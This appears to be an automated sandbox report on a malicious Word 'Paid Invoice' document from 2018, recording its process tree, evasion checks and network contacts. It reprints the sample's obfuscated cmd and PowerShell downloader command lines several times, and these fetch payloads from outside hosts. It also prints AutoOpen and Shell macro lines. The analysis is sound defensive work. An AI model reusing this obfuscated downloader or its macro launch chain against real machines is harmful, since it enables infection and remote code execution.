Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax

Spreading:

Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

System Summary:

Checks whether correct version of .NET is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Internet Explorer\iexplore.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Source: Binary string: mscorrc.pdb source: powershell.exe
Source: Binary string: t:\misc_urlredirection\x86\ship\0\urlredirection.pdb source: iexplore.exe
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: WINWORD.EXE
Source: Binary string: 0\urlredirection.dll\bbtopt\urlredirectionO.pdb source: iexplore.exe
Binary contains paths to development resources
Source: WINWORD.EXE | Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification label
Source: classification engine | Classification label: mal72.evad.expl.win@11/29@8/3
Creates files inside the user directory
Source: C:\Program Files\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Creates temporary files
Source: C:\Program Files\Internet Explorer\iexplore.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\~DF2B45E99636F7990D.TMP
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3388 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3388 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\Paid Invoice.doc
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe 'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Uses an in-process (OLE) Automation server
Source: C:\Program Files\Internet Explorer\iexplore.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Creates mutexes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Searches the installation path of Mozilla Firefox
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install Directory
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Paid Invoice[1].doc.1.dr | OLE, VBA macro line: Sub AutoOpen()
Source: Paid Invoice.doc.usc4tz8.partial.1.dr | OLE, VBA macro line: Sub AutoOpen()
Document contains an embedded VBA macro which may execute processes
Source: Paid Invoice[1].doc.1.dr | OLE, VBA macro line: Application.Run "rPWABqzMqXKuA", cwNlbCl
Source: Paid Invoice[1].doc.1.dr | OLE, VBA macro line: Shell jHDzcJuFfRGIVr, 0
Source: Paid Invoice.doc.usc4tz8.partial.1.dr | OLE, VBA macro line: Application.Run "rPWABqzMqXKuA", cwNlbCl
Source: Paid Invoice.doc.usc4tz8.partial.1.dr | OLE, VBA macro line: Shell jHDzcJuFfRGIVr, 0
Powershell connects to network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 203.195.212.211 443
Very long command line found
Source: unknown | Process created: Commandline size = 3137
Source: unknown | Process created: Commandline size = 2912
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: Commandline size = 3137
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2912

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: iexplore.exe, WINWORD.EXE, cmd.exe, powershell.exe | Binary or memory string: Progman
Source: iexplore.exe, WINWORD.EXE, cmd.exe, powershell.exe | Binary or memory string: Program Manager
Source: iexplore.exe, WINWORD.EXE, cmd.exe, powershell.exe | Binary or memory string: Shell_TrayWnd
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\cmd.exe (obfuscated command line, identical to the cmd.exe command line listed above)
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (obfuscated command line, identical to the powershell.exe command line listed above)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe (same obfuscated command line as listed above)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same obfuscated command line as listed above)

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

Malware Analysis System Evasion:

Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Starts Microsoft Word (often done to prevent the user from noticing that something is wrong)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 203.195.212.211 443

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Behavior Graph

Behavior Graph ID: 46214
URL: http://royal-tec.com/Paid-Invoices
Startdate: 12/02/2018
Architecture: WINDOWS
Score: 72

Top-level signatures:
  • Obfuscated command line found
  • Very long command line found
  • Document contains an embedded VBA with many randomly named variables
  • 2 other signatures

Process tree (with signatures and network contacts per node):
  • iexplore.exe (started)
    Signature: Browser exploit detected (process start blacklist hit)
    • WINWORD.EXE (started)
      Signatures: Obfuscated command line found; Very long command line found
      • cmd.exe (started)
        Signatures: Obfuscated command line found; Very long command line found
        • powershell.exe (started)
          Signatures: System process connects to network (likely due to code injection or exploit); Powershell connects to network
          Network: www.norsterra.cn 203.195.212.211, port 443 from local port 49180, CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa, China
    • iexplore.exe (started)
      Network: 8.8.8.8, local ports 50323, 50900, 51075, GOOGLE-GoogleIncUS, United States
      Network: royal-tec.com 50.63.111.1, port 80 from local ports 49164, 49165, AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS, United States
      • ssvagent.exe (started)

Simulations

Behavior and APIs

Time | Type | Description
21:34:48 | API Interceptor | 1695x Sleep call for process: iexplore.exe modified from: 60000ms to: 100ms
21:35:18 | API Interceptor | 1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

Source | Detection | Cloud
royal-tec.com | 0% | virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot